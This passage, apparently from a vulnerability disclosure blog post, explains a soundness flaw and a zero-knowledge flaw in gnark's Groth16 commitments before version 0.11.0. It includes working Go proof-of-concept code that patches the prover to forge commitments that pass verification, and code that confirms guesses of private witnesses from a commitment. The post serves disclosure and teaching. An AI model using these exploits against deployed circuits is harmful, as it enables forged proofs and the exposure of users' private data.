We emphasize that this issue only occurs when more than one commitment is used. The most likely way for a circuit to use commitments is via the range checks from the standard library, which can use them internally should the backend support commitments. However, commitments for range checks are used via the multicommit package, which only creates a single commitment. Thus, circuits using commitments purely through range checks or otherwise through multicommit are not vulnerable, as only a single commitment is used.

Proof of Concept

To demonstrate the issue that we just discussed, we produced a proof of concept. In it, we construct a circuit with two private witnesses, to which we assign random values. We commit individually to both private witnesses, producing two commitments and in-circuit challenges c_1 and c_2 corresponding to those commitments. We use the fungibility between the commitments to produce a proof with D_1^{\mathrm{fake}} = 0 and D_2^{\mathrm{fake}} = D_1^{\mathrm{correct}} + D_2^{\mathrm{correct}}. This way, no matter what we assign to the two private witnesses, the first challenge c_1 will always be a constant, the hash of the zero point.

As the commitments are calculated in the gnark library (rather than being passed to it as an argument), we need to patch the prover part of gnark to produce our malicious proofs. This is done with the following patch, based on version 0.10.0:

diff --git a/backend/groth16/bn254/prove.go b/backend/groth16/bn254/prove.go
index 100f30e8..1cf93b96 100644
--- a/backend/groth16/bn254/prove.go
+++ b/backend/groth16/bn254/prove.go
@@ -60,7 +60,7 @@ func (proof *Proof) CurveID() ecc.ID {
}

// Prove generates the proof of knowledge of a r1cs with full witness (secret + public part).
-func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, opts ...backend.ProverOption) (*Proof, error) {
+func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, fakeCommitments []curve.G1Affine, opts ...backend.ProverOption) (*Proof, error) {
opt, err := backend.NewProverConfig(opts...)
if err != nil {
return nil, fmt.Errorf("new prover config: %w", err)
@@ -91,10 +91,7 @@ func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, opts ...b
privateCommittedValues[i][j].SetBigInt(inJ)
}

- var err error
- if proof.Commitments[i], err = pk.CommitmentKeys[i].Commit(privateCommittedValues[i]); err != nil {
- return err
- }
+ proof.Commitments[i] = fakeCommitments[i]

opt.HashToFieldFn.Write(constraint.SerializeCommitment(proof.Commitments[i].Marshal(), hashed, (fr.Bits-1)/8+1))
hashBts := opt.HashToFieldFn.Sum(nil)
diff --git a/backend/groth16/groth16.go b/backend/groth16/groth16.go
index ca5b8bdc..36f3d459 100644
--- a/backend/groth16/groth16.go
+++ b/backend/groth16/groth16.go
@@ -179,7 +179,8 @@ func Prove(r1cs constraint.ConstraintSystem, pk ProvingKey, fullWitness witness.
if icicle_bn254.HasIcicle {
return icicle_bn254.Prove(_r1cs, pk.(*icicle_bn254.ProvingKey), fullWitness, opts...)
}
- return groth16_bn254.Prove(_r1cs, pk.(*groth16_bn254.ProvingKey), fullWitness, opts...)
+ panic("changed stuff for poc")
+ //return groth16_bn254.Prove(_r1cs, pk.(*groth16_bn254.ProvingKey), fullWitness, opts...)

case *cs_bw6761.R1CS:
return groth16_bw6761.Prove(_r1cs, pk.(*groth16_bw6761.ProvingKey), fullWitness, opts...)

The patch only makes a very small change: the Groth16 prover for the bn254 elliptic curve takes one extra argument, fakeCommitments, and instead of calculating the commitments itself, it uses the ones passed in fakeCommitments. Because the signature of the Prove function was changed, we also need to adjust one other place in the codebase to make it compile (the generic Prove function for Groth16, which is not specialized to concrete types for a specific curve).

By using a patched version of gnark as above, the following code then demonstrates the issue:

package main

import (
"crypto/sha256"
"fmt"
"log"
"math/big"
"math/rand"
"reflect"
"unsafe"

"github.com/consensys/gnark-crypto/ecc"
"github.com/consensys/gnark-crypto/ecc/bn254"
"github.com/consensys/gnark-crypto/ecc/bn254/fr"
"github.com/consensys/gnark-crypto/ecc/bn254/fr/hash_to_field"
fiatshamir "github.com/consensys/gnark-crypto/fiat-shamir"
"github.com/consensys/gnark/backend"
"github.com/consensys/gnark/backend/groth16"
groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
"github.com/consensys/gnark/constraint"
cs_bn254 "github.com/consensys/gnark/constraint/bn254"
"github.com/consensys/gnark/frontend"
"github.com/consensys/gnark/frontend/cs/r1cs"
)

// Our circuit has two private witnesses
type Circuit struct {
A frontend.Variable
B frontend.Variable
}

func (circuit *Circuit) Define(api frontend.API) error {
commitCompiler, ok := api.Compiler().(frontend.Committer)
if !ok {
return fmt.Errorf("compiler does not commit")
}

// We commit to both A and B separately, obtaining two challenges.
challenge_A, err := commitCompiler.Commit(circuit.A)
if err != nil {
return err
}
challenge_B, err := commitCompiler.Commit(circuit.B)
if err != nil {
return err
}

// To have some constraints involving the private witnesses and challenges, we constrain them to be nonzero.
api.AssertIsDifferent(challenge_A, 0)
api.AssertIsDifferent(challenge_B, 0)
api.AssertIsDifferent(circuit.A, 0)
api.AssertIsDifferent(circuit.B, 0)

// The two challenges should depend on the value assigned to the respective circuit variables
// in such a way that it is impossible to change the underlying circuit variable's values
// without the corresponding challenges changing as well.
// We demonstrate that this does not hold and we can choose the circuit variable being committed to
// *after* fixing the challenge that should randomly depend on it, by constraining
// the challenge to be a constant. We will still be able to prove the circuit for
// any value assigned to the circuit variables.
var hashOfZero fr.Element
var hashOfZeroBigInt big.Int
hashOfZeroBigInt.SetString("14057090015281774264105022686285549399478565317353443989948588114876049265504", 10)
hashOfZero.SetBigInt(&hashOfZeroBigInt)
fmt.Println("Constraining the challenge based on the commitment to A to be the hash of zero: ", hashOfZero.String())
api.AssertIsEqual(challenge_A, hashOfZero)

return nil
}

func main() {
// Setup circuit
var circ Circuit
ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circ)
if err != nil {
panic(err)
}

// Assigning some random values.
A := *big.NewInt(rand.Int63())
B := *big.NewInt(rand.Int63())
var w Circuit
w.A = A
w.B = B
fmt.Println("Assigning random value A = ", A.String())
fmt.Println("Assigning random value B = ", B.String())

// Running setup, and prover.
witness, err := frontend.NewWitness(&w, ecc.BN254.ScalarField())
if err != nil {
panic(err)
}
witnessPublic, err := witness.Public()
if err != nil {
panic(err)
}
pk, vk, err := groth16.Setup(ccs)
if err != nil {
panic(err)
}

// Converting proving key to concrete type
pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
if !ok {
log.Fatal("unexpected type for proving key")
}

// Construct fake commitment, and associated proof of knowledge.
// In this case, we make the first commitment zero.
commitments, commitmentPok := fakeCommitment(*pkConcrete, A, B, *big.NewInt(0), *big.NewInt(0))

// groth16_bn254.Prove has been modified to use our supplied commitments instead of
// calculating the legitimate ones.
fakeProof, err := groth16_bn254.Prove(ccs.(*cs_bn254.R1CS), pkConcrete, witness, commitments)
if err != nil {
panic(err)
}
// The proof of knowledge for the commitment calculated by groth16_bn254.Prove will not
// fit our fake commitments, so we replace it with the previously calculated pok.
fakeProof.CommitmentPok = commitmentPok

// groth16.Verify has not been modified, yet it accepts our proof with incorrect commitments.
err = groth16.Verify(fakeProof, vk, witnessPublic)
if err != nil {
panic(err)
}
}

// Constructs fake commitments. Only works for two commitments to one circuit variable each.
// Will fake the first commitment to be FirstCommitmentA*Base[0] + FirstCommitmentB*Base[1]
// instead of the expected AReal*Base[0]. Will also calculate the corresponding proof of knowledge.
func fakeCommitment(pk groth16_bn254.ProvingKey, AReal big.Int, BReal big.Int, FirstCommitmentA big.Int, FirstCommitmentB big.Int) ([]bn254.G1Affine, bn254.G1Affine) {
expConfig := ecc.MultiExpConfig{
NbTasks: 1,
}

// Casting values to Fr elements
var ARealFr fr.Element
var BRealFr fr.Element
var FirstCommitmentAFr fr.Element
var FirstCommitmentBFr fr.Element
ARealFr.SetBigInt(&AReal)
BRealFr.SetBigInt(&BReal)
FirstCommitmentAFr.SetBigInt(&FirstCommitmentA)
FirstCommitmentBFr.SetBigInt(&FirstCommitmentB)

// Get the commitment key basis elements
basisPointsA, err := getBasisField(&pk.CommitmentKeys[0])
if err != nil {
panic(err)
}
basisPointsB, err := getBasisField(&pk.CommitmentKeys[1])
if err != nil {
panic(err)
}

commitments := make([]bn254.G1Affine, 2)
exponents := make([]fr.Element, 2)

// commitments[0] = FCA * Base[0] + FCB * Base[1]
exponents[0] = FirstCommitmentAFr
exponents[1] = FirstCommitmentBFr
commitments[0].MultiExp([]bn254.G1Affine{basisPointsA[0], basisPointsB[0]}, exponents, expConfig)

// commitments[1] = (A - FCA) * Base[0] + (B - FCB) * Base[1]
exponents[0].Sub(&ARealFr, &FirstCommitmentAFr)
exponents[1].Sub(&BRealFr, &FirstCommitmentBFr)
commitments[1].MultiExp([]bn254.G1Affine{basisPointsA[0], basisPointsB[0]}, exponents, expConfig)

//commitmentPublicInputs, commitmentsSerialized, err := getCommitmentsHashes(commitments)
_, commitmentsSerialized, err := getCommitmentsHashes(commitments)
if err != nil {
panic(err)
}
//The printout below can be used to get that constant we use in the circuit constraints
//fmt.Println("first commitment public input = ", commitmentPublicInputs[0].String())

// Get the challenge for commitment folding.
r, err := getChallenge(commitmentsSerialized)
if err != nil {
panic(err)
}

// Calculation of the proof of knowledge going along with the commitments:

// commitments[0] = FCA * Base[0] + FCB * Base[1]
// commitments[1] = (A - FCA) * Base[0] + (B - FCB) * Base[1]
// foldedCommitment = (FCA + r*(A - FCA)) * Base[0] + (FCB + r*(B - FCB)) * Base[1]

exponents[0].Mul(&exponents[0], &r)
exponents[0].Add(&exponents[0], &FirstCommitmentAFr)

exponents[1].Mul(&exponents[1], &r)
exponents[1].Add(&exponents[1], &FirstCommitmentBFr)

basisExpSigmaPointsA, err := getBasisExpSigmaField(&pk.CommitmentKeys[0])
if err != nil {
panic(err)
}
basisExpSigmaPointsB, err := getBasisExpSigmaField(&pk.CommitmentKeys[1])
if err != nil {
panic(err)
}

var pok bn254.G1Affine
pok.MultiExp([]bn254.G1Affine{basisExpSigmaPointsA[0], basisExpSigmaPointsB[0]}, exponents, expConfig)

return commitments, pok
}

// This function calculates the commitment hashes added to the public inputs,
// and calculates the commitmentsSerialized value used for calculating the challenge in commitment folding.
// The code here is mostly copied from gnark's backend/groth16/bn254/verify.go
func getCommitmentsHashes(commitments []bn254.G1Affine) ([]fr.Element, []byte, error) {
opt, err := backend.NewVerifierConfig()
if err != nil {
return nil, nil, fmt.Errorf("new verifier config: %w", err)
}
if opt.HashToFieldFn == nil {
opt.HashToFieldFn = hash_to_field.New([]byte(constraint.CommitmentDst))
}
commitmentHashesAsPublicWitnesses := make([]fr.Element, len(commitments))
commitmentsSerialized := make([]byte, len(commitments)*fr.Bytes)
commitmentPrehashSerialized := make([]byte, bn254.SizeOfG1AffineUncompressed)
for i := range len(commitments) {
copy(commitmentPrehashSerialized, commitments[i].Marshal())
opt.HashToFieldFn.Write(commitmentPrehashSerialized[:bn254.SizeOfG1AffineUncompressed])
hashBts := opt.HashToFieldFn.Sum(nil)
opt.HashToFieldFn.Reset()
nbBuf := fr.Bytes
if opt.HashToFieldFn.Size() < fr.Bytes {
nbBuf = opt.HashToFieldFn.Size()
}
var res fr.Element
res.SetBytes(hashBts[:nbBuf])
commitmentHashesAsPublicWitnesses[i] = res
copy(commitmentsSerialized[i*fr.Bytes:], res.Marshal())
}

return commitmentHashesAsPublicWitnesses, commitmentsSerialized, nil
}

// copied from gnark-crypto's source code, ecc/bn254/fr/pedersen/pedersen.go
// (it is a private function, so we can't call it)
func getChallenge(fiatshamirSeeds ...[]byte) (r fr.Element, err error) {
// incorporate user-provided seeds into the transcript
t := fiatshamir.NewTranscript(sha256.New(), "r")
for i := range fiatshamirSeeds {
if err = t.Bind("r", fiatshamirSeeds[i]); err != nil {
return
}
}

// obtain the challenge
var rBytes []byte

if rBytes, err = t.ComputeChallenge("r"); err != nil {
return
}
r.SetBytes(rBytes) // TODO @Tabaie Plonk challenge generation done the same way; replace both with hash to fr?
return
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
// Reflect on the pointer
commitmentPkValue := reflect.ValueOf(commitmentPk)

if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
return nil, fmt.Errorf("expected a pointer to a struct")
}

// Access the 'basis' field
basisField := commitmentPkValue.Elem().FieldByName("basis")
if !basisField.IsValid() {
return nil, fmt.Errorf("field 'basis' not found")
}

if !basisField.CanInterface() {
// To access an unexported field, we need to bypass safety
basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
}

basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
if !ok {
return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
}

return basisFieldConcrete, nil
}

// Like getBasisField but for basisExpSigma
func getBasisExpSigmaField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
// Reflect on the pointer
commitmentPkValue := reflect.ValueOf(commitmentPk)

if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
return nil, fmt.Errorf("expected a pointer to a struct")
}

// Access the 'basis' field
basisField := commitmentPkValue.Elem().FieldByName("basisExpSigma")
if !basisField.IsValid() {
return nil, fmt.Errorf("field 'basisExpSigma' not found")
}

if !basisField.CanInterface() {
// To access an unexported field, we need to bypass safety
basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
}

basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
if !ok {
return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
}

return basisFieldConcrete, nil
}

Running this program will produce output such as the following:

17:16:43 INF compiling circuit
17:16:43 INF parsed circuit inputs nbPublic=0 nbSecret=2
Constraining the challenge based on the commitment to A to be the hash of zero: 14057090015281774264105022686285549399478565317353443989948588114876049265504
17:16:43 INF building constraint builder nbConstraints=5
Assigning random value A = 2593177307956940674
Assigning random value B = 228695105607157038
17:16:43 DBG constraint system solver done nbConstraints=5 took=0.239835
17:16:43 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=5 took=3.831231
17:16:43 DBG verifier done backend=groth16 curve=bn254 took=4.448234

The values assigned to the circuit variables A and B will be fresh, random values each time, but nevertheless, verification does pass for a circuit constraining the challenge based on the commitment to circuit variable A to be a specific constant.

The Fix

After we reported the above vulnerability to gnark, the protocol regarding the proof of knowledge associated to the commitments was changed to the variant using k+1 pairings that we discussed above. This fix is included starting from version 0.11.0.

Commitment Schemes

There is a second vulnerability associated to the commitments as used by gnark up to version 0.10.0, related to the proof scheme’s zero-knowledge property.

But before getting into that vulnerability, let us take a step back from the particulars of Groth16 and gnark's extension to it and discuss what it actually means to talk about commitments. A commitment scheme is a way for a committer to commit to some value in a way that binds them to it. The value should be hidden from the receiver of the commitment, but the committer should be able to open the commitment at some later time, thereby revealing the committed value and convincing the receiver that this was the value they had committed to all along. More precisely, a commitment scheme of the type relevant for us has two main phases as follows:

Commitment: The committer runs a commitment algorithm \mathcal{C} that takes as input a value x (from a predefined set) as well as randomness; it outputs \mathcal{C}(x) = (C, d), consisting of a commitment C and some extra decommitment information d. While C can be published, the committer keeps d for themselves, as this is what they need to open the commitment later. In some cases, d might not be needed.

Opening: At some later time, the committer publishes x and d. Other parties can now run a verification algorithm \mathcal{V} that takes ((C, d), x) as input and either accepts (returns 1) or rejects (returns 0).

The idea is that the verification algorithm should only accept ((C, d), x) if x is the value that was used as the input to the commitment algorithm that originally produced C. Also, we don't want it to be possible for anyone to recover x from just C. To be a bit more precise, we can define the following properties such a scheme might satisfy:

Completeness: The verification algorithm accepts on data produced by the commitment algorithm: \mathcal{V}(\mathcal{C}(x), x) = 1.

Binding: It is infeasible for an attacker to produce C, x, x', d, d' so that \mathcal{V}((C, d), x) = 1 and \mathcal{V}((C, d'), x') = 1 but x \neq x'. The upshot of this property is that once C is published, the only value the committer can open C to is the one they originally used when computing C.

Hiding: Given only C, an attacker cannot recover the value x committed to via C. To be more precise, we could ask for this to be computationally infeasible (computationally hiding), but we could also ask for this to be truly impossible because for any x there exists a d such that C can be opened to x, and each x is equally probable as long as the committer chose d to be uniformly random (perfect hiding).

A commitment scheme that is often used is the Pedersen commitment scheme. To introduce it, let G be an abelian group with p elements (with p a prime) and g_1, \dots, g_n, h nonzero elements of G. We now describe how we can use Pedersen commitments to commit to a tuple (x_1, \dots, x_n) of elements of \mathbb{F}_p.

Commitment: Given (x_1, \dots, x_n), a uniformly random element d \in \mathbb{F}_p is sampled. The commitment and decommitment information is then given by \mathcal{C}(x) = (C, d) = (d \cdot h + \sum_{i=1}^n x_i \cdot g_i, d).

Verification: The verification algorithm returns 1 if and only if the equality C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i holds.

It is immediate that this scheme is complete as defined above. It is also perfectly hiding. This can be seen as follows: fix x and consider the uniformly random distribution on \mathbb{F}_p for d. If d is uniformly random, then d \cdot h is uniformly random as well, as h is nonzero and multiplication by a nonzero element of \mathbb{F}_p is a bijection. Similarly, adding a constant is a bijection as well, so C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i is uniformly random. In particular, the distribution of C is the same no matter what x was, and hence given C, all values for x are equally probable, as long as d is chosen uniformly at random.

How about the binding property? The answer to this depends on the group used. For example, if we used G = \mathbb{Z}/p\mathbb{Z}, then this scheme would not be binding at all. Indeed, given a fixed C, finding tuples (x_1, \dots, x_n, d) so that \mathcal{V}((C, d), (x_1, \dots, x_n)) = 1 amounts to solving the linear equation C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i. This is easily doable; given any x_1, \dots, x_n we can use d = h^{-1} \cdot \left(C - \sum_{i=1}^n x_i \cdot g_i\right).

The problem of solving equations of the form C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i in G for d, x_1, \dots, x_n, where h and g_1, \dots, g_n are uniformly random elements of G, is called the discrete log (relation) problem. That the discrete log problem is hard for G means that it is computationally intractable to solve such equations. So the Pedersen commitment scheme is computationally binding if the discrete logarithm problem is hard in G and h and g_1, \dots, g_n were chosen as independent uniformly random elements of G. Note that h, g_1, \dots, g_n being independent and uniformly random is necessary, as it is easy to solve the given equation if, for example, h = g_1 = \cdots = g_n.

The Zero-Knowledge Vulnerability

Let us now get back to gnark's extension to Groth16. We will again use the notation from before. As we discussed, the commitments that a gnark Groth16 proof might come with have the form D_i = \sum_{j \in \mathcal{J}_i} a_j \cdot L_j. The a_j are private witnesses,2 and the L_j are points on an elliptic curve for which the discrete logarithm problem is assumed to be hard. But are these commitments D_i binding and hiding? We will first begin with the binding property and then discuss the failure of the commitments to be hiding. The commitments not being hiding implies that the proving system does not satisfy zero-knowledge, and we discuss the practical impact of this. We also discuss how the standard library's range checks use commitments, and we provide a proof of concept in which private witnesses are recovered from range checks.

The Binding Property of the Commitments

In this subsection, we consider under which conditions the commitments may have the binding property. By the discussion in the previous section, the commitment will be computationally binding as long as the points L_j are independent uniformly random elements of the elliptic curve.

Before discussing under which condition this property might hold, let us first point out that, unlike the general idea of commitments, the commitments of gnark’s Groth16 extension are not intended to be opened. That the commitment is binding, as defined above, is thus actually not really that relevant.

What is more relevant is that \mathcal{H}(D_i) acts as a random function of the assignments of the circuit variables committed to, as this is what is needed to ultimately use the hash of the commitment as a random challenge depending on the committed-to circuit variables. If we consider the case of only a single commitment, and \mathcal{H} may be treated as a random function, then this requirement essentially boils down to the points L_j being indistinguishable from independent uniformly random points from the perspective of the prover, and thus is equivalent to the commitment being binding. If there is more than one commitment, then the additional question arises of whether the commitments can be treated separately or not. This is precisely what the soundness vulnerability discussed above is about.

Getting back to the binding property, the condition that the relevant L_j are independent and uniformly random is not satisfied in general. Roughly, if the coefficients of some circuit variables in constraints always satisfy a linear relation,3 then the associated L_j will also satisfy this relation.

To illustrate what we mean by this, suppose we are considering a single commitment D to two circuit variables x and y, with D = x \cdot L_x + y \cdot L_y. There may be constraints imposed such as (c \cdot x + d \cdot y) \cdot (2 \cdot c \cdot x + 2 \cdot d \cdot y) = z or c \cdot x + d \cdot y = 42. The property to note here is that the coefficient for y in each factor and in the linear term is always the same multiple \frac{d}{c} of the coefficient for x. It will then hold that also L_y = \frac{d}{c} \cdot L_x. The upshot of the observation that d \cdot L_x = c \cdot L_y is that the prover knows a relation d \cdot L_x - c \cdot L_y = 0, so if they originally committed to (x, y), they may also open the commitment to (x + r \cdot d, y - r \cdot c) for any r \in \mathbb{F}_p. Taking the point of view where \mathcal{H}(D) will be used as a random challenge depending on x and y, the prover, after learning what the challenge \mathcal{H}(D) will be, still has one degree of freedom to adjust x and y. However, this actually does not help a malicious prover. This is because the test being performed using the challenge value (like a Schwartz-Zippel–style equality check) can only depend on c \cdot x + d \cdot y by our assumption, and this value does not change under this adjustment!

We won't go into detail on why the above holds in general, as this would involve the details of Groth16 and its arithmetization in more depth than we cover in this article. The following example demonstrates the observation in practice, however. In it, we define a circuit with two private witnesses, which we commit to together. We add constraints as above and then check that the relation d \cdot L_x = c \cdot L_y indeed holds.

package main

import (
"fmt"
"log"
"math/big"
"reflect"
"unsafe"

"github.com/consensys/gnark-crypto/ecc"
"github.com/consensys/gnark-crypto/ecc/bn254"
"github.com/consensys/gnark/backend/groth16"
groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
"github.com/consensys/gnark/frontend"
"github.com/consensys/gnark/frontend/cs/r1cs"
)

const c = 5
const d = 7

type Circuit struct {
SecretWitnessX frontend.Variable
SecretWitnessY frontend.Variable
}

func (circuit *Circuit) Define(api frontend.API) error {
commitCompiler, ok := api.Compiler().(frontend.Committer)
if !ok {
return fmt.Errorf("compiler does not commit")
}

_, err := commitCompiler.Commit(circuit.SecretWitnessX, circuit.SecretWitnessY)
if err != nil {
return err
}

// We add some constraints where the ratio between the coefficients for Y and X is always d/c.
sum1 := api.Add(api.Mul(c, circuit.SecretWitnessX), api.Mul(d, circuit.SecretWitnessY))
sum2 := api.Add(api.Mul(2*c, circuit.SecretWitnessX), api.Mul(2*d, circuit.SecretWitnessY))
api.Mul(sum1, sum2)
api.AssertIsEqual(sum1, c*42+d*47)
return nil
}

func main() {
// Setup circuit
var circ Circuit
ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circ)
if err != nil {
panic(err)
}

// Assigning some values.
var w Circuit
w.SecretWitnessX = 42
w.SecretWitnessY = 47

// Running setup and prover.
witness, err := frontend.NewWitness(&w, ecc.BN254.ScalarField())
if err != nil {
panic(err)
}
witnessPublic, err := witness.Public()
if err != nil {
panic(err)
}
pk, vk, err := groth16.Setup(ccs)
if err != nil {
panic(err)
}
pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
if !ok {
log.Fatal("unexpected type for proving key")
}
proof, err := groth16.Prove(ccs, pk, witness)
if err != nil {
panic(err)
}

commitmentPk := &pkConcrete.CommitmentKeys[0]
basisFieldConcrete, err := getBasisField(commitmentPk)
if err != nil {
fmt.Println("Error:", err)
return
}

// Check the linear relation satisfied by the basis elements for the commitments
scaledBasisX := new(bn254.G1Affine)
scaledBasisX.ScalarMultiplication(&basisFieldConcrete[0], big.NewInt(d))
scaledBasisY := new(bn254.G1Affine)
scaledBasisY.ScalarMultiplication(&basisFieldConcrete[1], big.NewInt(c))
fmt.Println("d*basis[0] == c*basis[1] :", *scaledBasisX == *scaledBasisY)

err = groth16.Verify(proof, vk, witnessPublic)
if err != nil {
panic(err)
}
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
// Reflect on the pointer
commitmentPkValue := reflect.ValueOf(commitmentPk)

if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
return nil, fmt.Errorf("expected a pointer to a struct")
}

// Access the 'basis' field
basisField := commitmentPkValue.Elem().FieldByName("basis")
if !basisField.IsValid() {
return nil, fmt.Errorf("field 'basis' not found")
}

if !basisField.CanInterface() {
// To access an unexported field, we need to bypass safety
basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
}

basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
if !ok {
return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
}

return basisFieldConcrete, nil
}

The output will be as follows:

13:17:21 INF compiling circuit
13:17:21 INF parsed circuit inputs nbPublic=0 nbSecret=2
13:17:21 INF building constraint builder nbConstraints=2
13:17:21 DBG constraint system solver done nbConstraints=2 took=0.771787
13:17:21 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=2 took=2.421542
d*basis[0] == c*basis[1] : true
13:17:21 DBG verifier done backend=groth16 curve=bn254 took=3.512609

We have now described one specific way in which the commitment is not binding, or $\mathcal{H}(D_i)$ not a random function of the committed-to circuit variables, but we have also argued why this is not an issue in practice. This raises the question of whether this is the only manner in which the property fails, so that $\mathcal{H}(D_i)$ does satisfy the security property required of it in practice for use as a random challenge. The author expects that this is the case, but we have not attempted to formally define the required property and prove it.

The Hiding Property of the Commitments

In comparison with the Pedersen commitments discussed before, the commitments used by gnark, being of the form $D_i = \sum_{j \in \mathcal{J}_i} a_j \cdot L_j$, lack the blinding summand $d \cdot h$, which is what makes Pedersen commitments perfectly hiding. The commitments used by gnark (before version 0.11.0) were thus not hiding. What does this mean in practice?

Let us consider a single commitment $D = \sum_{i=1}^{k} a_i \cdot L_i$. Suppose an attacker, who has access only to $D$ and the $L_i$, but not the original $a_i$ used to calculate $D$, makes a guess $a'_i$ for each value $a_i$. The attacker can then verify whether that guess is correct by checking $D \stackrel{?}{=} \sum_{i=1}^k a'_i \cdot L_i$. If equality holds, then either $a_i = a'_i$ for all $1 \leq i \leq k$, or a linear relation $\sum_{i=1}^k (a_i - a'_i) \cdot L_i = 0$ has been found, which we assume does not occur in practice by the hardness of the discrete-logarithm problem, as long as $L_1, \dots, L_k$ are independently uniformly random. Hence, in practice (putting aside the exceptions to the binding property discussed in the previous subsection), equality holding implies that the attacker found the original values used by the prover.

An attacker can thus use $D$ and $L_1, \dots, L_k$ to brute-force the original values of $a_1, \dots, a_k$. If the attacker has no information about what $a_1, \dots, a_k$ might be (in other words, if from their perspective $(a_1, \dots, a_k)$ is a uniformly random element of $\mathbb{F}_p^k$), then this will be infeasible in practice, as the search space is intractably large. However, if there is only a small number of possibilities for each of $a_1$ to $a_k$, then it may be feasible to search the entire space. For example, $a_i$ might be a leaf in a Merkle tree, with the circuit verifying a Merkle inclusion proof and being intended to protect knowledge of which leaf was used in the proof. If the leaves are publicly known, then it might be feasible for an attacker to verify guesses for each leaf.

The failure of the commitments to be hiding relates to the extended Groth16 system’s zero-knowledge property. The zero-knowledge property requires that it be impossible to extract from the proof any knowledge about the private witnesses, beyond the fact that the prover knows private witnesses satisfying the circuit’s constraints. The issue just described implies that it is possible to extract information about those private witnesses that are involved in commitments, violating the zero-knowledge property.

The following code demonstrates this. We define a simple circuit, with a single private witness that is committed. We assign the private witness the value 42. The code then checks that the commitment that comes with the proof is indeed given by 42 times the corresponding basis element that is part of the proving key.

package main

import (
"fmt"
"log"
"math/big"
"reflect"
"unsafe"

"github.com/consensys/gnark-crypto/ecc"
"github.com/consensys/gnark-crypto/ecc/bn254"
"github.com/consensys/gnark/backend/groth16"
groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
"github.com/consensys/gnark/frontend"
"github.com/consensys/gnark/frontend/cs/r1cs"
)

const secret = 42

type Circuit struct {
SecretWitness frontend.Variable
}

func (circuit *Circuit) Define(api frontend.API) error {
commitCompiler, ok := api.Compiler().(frontend.Committer)
if !ok {
return fmt.Errorf("compiler does not commit")
}

commit, err := commitCompiler.Commit(circuit.SecretWitness)
if err != nil {
return err
}

api.AssertIsDifferent(commit, 0)
api.AssertIsDifferent(circuit.SecretWitness, 0)
return nil
}

func main() {
// Setup circuit
var circ Circuit
ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circ)
if err != nil {
panic(err)
}

// Assigning some values.
var w Circuit
w.SecretWitness = secret

// Running setup and prover.
witness, err := frontend.NewWitness(&w, ecc.BN254.ScalarField())
if err != nil {
panic(err)
}
witnessPublic, err := witness.Public()
if err != nil {
panic(err)
}
pk, vk, err := groth16.Setup(ccs)
if err != nil {
panic(err)
}
pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
if !ok {
log.Fatal("unexpected type for proving key")
}
proof, err := groth16.Prove(ccs, pk, witness)
if err != nil {
panic(err)
}
proofConcrete, ok := proof.(*groth16_bn254.Proof)
if !ok {
log.Fatal("unexpected type for proof")
}

// We check our guess for the secret witness.
var guess_test bn254.G1Affine
basisPoints, err := getBasisField(&pkConcrete.CommitmentKeys[0])
if err != nil {
panic(err)
}
guess_test.ScalarMultiplication(&basisPoints[0], big.NewInt(secret))
fmt.Println("Commitment equal to secret times commitment key basis element: ", guess_test == proofConcrete.Commitments[0])

err = groth16.Verify(proof, vk, witnessPublic)
if err != nil {
panic(err)
}
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
// Reflect on the pointer
commitmentPkValue := reflect.ValueOf(commitmentPk)

if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
return nil, fmt.Errorf("expected a pointer to a struct")
}

// Access the 'basis' field
basisField := commitmentPkValue.Elem().FieldByName("basis")
if !basisField.IsValid() {
return nil, fmt.Errorf("field 'basis' not found")
}

if !basisField.CanInterface() {
// To access an unexported field, we need to bypass safety
basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
}

basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
